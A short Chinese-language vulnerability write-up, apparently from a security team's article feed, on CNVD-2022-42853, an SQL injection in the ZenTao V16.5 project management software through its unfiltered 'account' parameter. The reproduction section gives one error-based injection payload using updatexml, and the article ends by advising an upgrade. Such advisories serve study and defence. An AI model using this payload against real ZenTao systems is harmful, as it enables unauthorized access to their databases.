CNVD-2022-42853：禅道V16.5SQL注入漏洞

上方蓝色字体关注我们，一起学安全！

作者：bnlbnf@Timeline Sec

本文字数：619

阅读时长：2～3min

声明：仅供学习参考使用，请勿用作违法用途，否则后果自负

0x01 简介

禅道由青岛易软天创网络科技有限公司开发，国产开源项目管理软件。

它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整覆盖了研发项目管理的核心流程。

禅道管理思想注重实效，功能完备丰富，操作简洁高效，界面美观大方，搜索功能强大，统计报表丰富多样，软件架构合理，扩展灵活，有完善的API可以调用。

0x02 漏洞概述

禅道V16.5未对输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行。

0x03 影响版本

禅道V16.5

0x04 环境搭建

下载一键安装包

https://www.zentao.net/download/zentaopms16.5-80656.html

启动，然后访问

0x05 漏洞复现

报错型注入payload:

admin' and updatexml(1,concat(0x7e,(123=123),0x7e),1) and '1'='1

0x06 修复方式

升级最新版本

https://www.zentao.net

参考链接：

https://www.cnblogs.com/spmonkey/articles/16611302.html